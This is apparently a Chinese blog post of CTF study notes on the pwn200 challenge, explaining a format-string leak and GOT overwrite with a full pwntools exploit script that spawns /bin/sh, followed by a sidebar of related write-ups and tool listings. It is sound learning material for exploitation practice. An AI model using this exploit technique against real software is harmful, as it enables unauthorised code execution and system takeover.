PWN学习笔记--HCTF2017 pwn200

最新推荐文章于 2023-03-10 20:44:21 发布
最新推荐文章于 2023-03-10 20:44:21 发布
阅读量429 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_15727809/article/details/89512807
版权

参考链接:https://bbs.pediy.com/thread-224645.htm

考点:格式化字符串、GOT覆盖

思路:首先利用格式化字符串泄露出puts函数的实际地址,然后根据libc计算出system的地址。接着用得到的system的地址覆盖atoi的got地址,最后传入/bin/sh参数即可。

漏洞程序:
2017湖湘杯pwn200
在这里插入图片描述
漏洞利用程序:

from pwn import *

elf = ELF("./pwne")

libc = ELF("/lib/i386-linux-gnu/libc.so.6")

p = process("./pwne")
p.recvuntil("[Y/N]\n")
p.sendline("Y")
p.recvuntil("NAME:\n\n")

# 1.leak puts addr (AAAA%7$x)
data1 = p32(elf.got["puts"])+"%7$s"
print data1
p.sendline(data1)
p.recvuntil('WELCOME \n')
puts_addr=p.recv()[4:8]

# 2. calculate system addr
system_addr = libc.symbols["system"]-libc.symbols["puts"]+u32(puts_addr)
print hex(system_addr)
#p.recvuntil("GET YOUR AGE:\n")
p.sendline("17")
p.recvuntil("[Y/N]\n")
p.sendline("Y")
p.recvuntil("NAME:\n\n")

# 3.cover atoi got addr by system addr
atoi_got = elf.got["atoi"]
print hex(atoi_got)
data2 = fmtstr_payload(7,{atoi_got:system_addr})
print data2
p.sendline(data2)

# 4.pass system argv
p.recvuntil("GET YOUR AGE:\n\n")
p.sendline("/bin/sh")

p.interactive()

实验结果:
在这里插入图片描述
关键点:

1)泄露地址时,输入AAAA%7$x得到41414141即地址和参数的偏移为7,那么如果把AAAA换成地址,%7$x换成%7$s则就将地址打印出来了
2)fmtstr_payload的用法
fmtstr_payload( offset, writes, numbwritten=0,write_size=‘byte’)
– offset: 可控的栈偏移
– writes:是一个字典{addr:value}
– numbwritten : 通过printf函数已经写入的字节大小
– write_size : 必须是byte, short或int,表示是%hhn, %hn或%n传数据

Angelki
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2017湖湘pwn200
12-02
2017湖湘pwn200的题目,请大家自行下载。。。。。。
PWN学习笔记
qamcwc的博客
01-22 4092
一些名词介绍 exploit :用于攻击的脚本与方案 payload :利用漏洞时构造的恶意数据 shellcode :包含在恶意数据中的机器码(机器码在攻击时拿到shell) 程序的编译与链接 目前,软件世界有40%的漏洞是由C和C++写成的 cat +文件名 :输出文件内容 elf :Linux下可执行文件格式 从C源代码到可执行文件的生成过程 C源代码经过编译成为汇编代码,汇编代码再经过汇编成为机器码,即生成一个elf(二进制)目标文件,进行链接后成为elf可执行文件 可.
Pwn学习笔记
有头发的埼玉
11-03 152
pwn个人学习笔记
PWN-汇编学习笔记
yajuanpi4899的博客
01-09 3284
目录 一、汇编和PWN的关系 二、常用知识点 三、windows下搭建debug实验环境 一、汇编和PWN的关系 PWN需要对逆向了解,调试模式中会产生大量的汇编代码解读,需要对汇编有一定的基础。本文基于《汇编语言》第四版 王爽 一书进行一定知识点的提取和总结。 二、常用知识点 8086的CPU通用寄存器均为16位,可以存放两个字节,AX,BX,CX,DX四个寄存器存一般性数据。 ah:AX高位寄存器 al:AX地位寄存器 字节(byte):8位bit,存在8位寄存器中 字(wo
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
HCTF2017-Web-Writeup
dengzhasong7076的博客
11-14 2384
boring website 先通过扫描得到: http://106.15.53.124:38324/www.zip <?php echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br /...
pwn by example学习笔记(一)
沐沐的博客
05-15 1419
通过一些例子来学习pwn,这些例子来自于github上的ctf-wiki pwn部分栈溢出原理(示例:ret2text)首先,获取要pwn的程序的基本信息这个程序是Linux下32位的elf格式的可执行文件,没有开启栈(stack)保护机制,没有开启nx了解了程序的基本信息以后,就运行下程序发现只有输入和输出,而且就只有一个输入点。放到ida里面去跑一下可以看到,gets从标准输入设备读字符串函数...
PWN入门笔记
WuXianYo_的博客
03-10 150
PWN入门笔记
Pwn学习笔记-持续更新
MrTreebook的博客
03-03 340
Pwn学习笔记-持续更新第一节:基本命令第二节:gdb 第一节:基本命令 命令 介绍 readelf 查看elf nm hexdump 查看十六进制 strings ldd 查看库函数的位置 objdump 反编译成汇编 objdump [-d] [file] [-M] [intel] 查看intel下的汇编 gcc [-S] 直接编译成汇编代码 第二节:gdb gdb命令 介绍 i i r :查看寄存器 b 下断点 d 删除断点
HCTF2017的三个WriteUp
hl1293348082的专栏
04-02 251
0x00 题目 感觉自己还是太菜了,比赛结束前只做出来了三道题。 Evr_Q (level - 1) guestbook (level - 2) babystack (level - 3) 0x01 Evr_Q 程序会先要求输入 User 载入到 IDA 进行分析 但是在进行 F5 反编译的时候发生了一个错误 Decompilation failure: 413238: positive sp value has been found 解决方法就是先 undefine 掉函
HCTF 2017 bin Level1 Evr_Q Writeup
atmysy的博客
11-13 755
HCTF 2017 bin Level1 Evr_Q Writeup
HITCON_CMT_2017_pwn200
Starr
03-22 1976
文章目录1. 基本信息反汇编思路3. 调试4. exp源码 文件下载 1. 基本信息 file: $ file HITCON_CMT_2017_pwn200 HITCON_CMT_2017_pwn200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=57aa663
HITCON CMT2017-pwn200-wp
fa1c4的blog
02-02 533
HITCON community 2017的一道pwn题 #include<stdio.h> #include<stdlib.h> void canary_protect_me(){ system("/bin/sh"); } int main(){ setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1, 0LL); char buf[40]; gets(buf); printf(buf)
攻防世界 pwn-200
winterze的博客
04-04 633
攻防世界 pwn-200 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/pwn/pwn-200' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值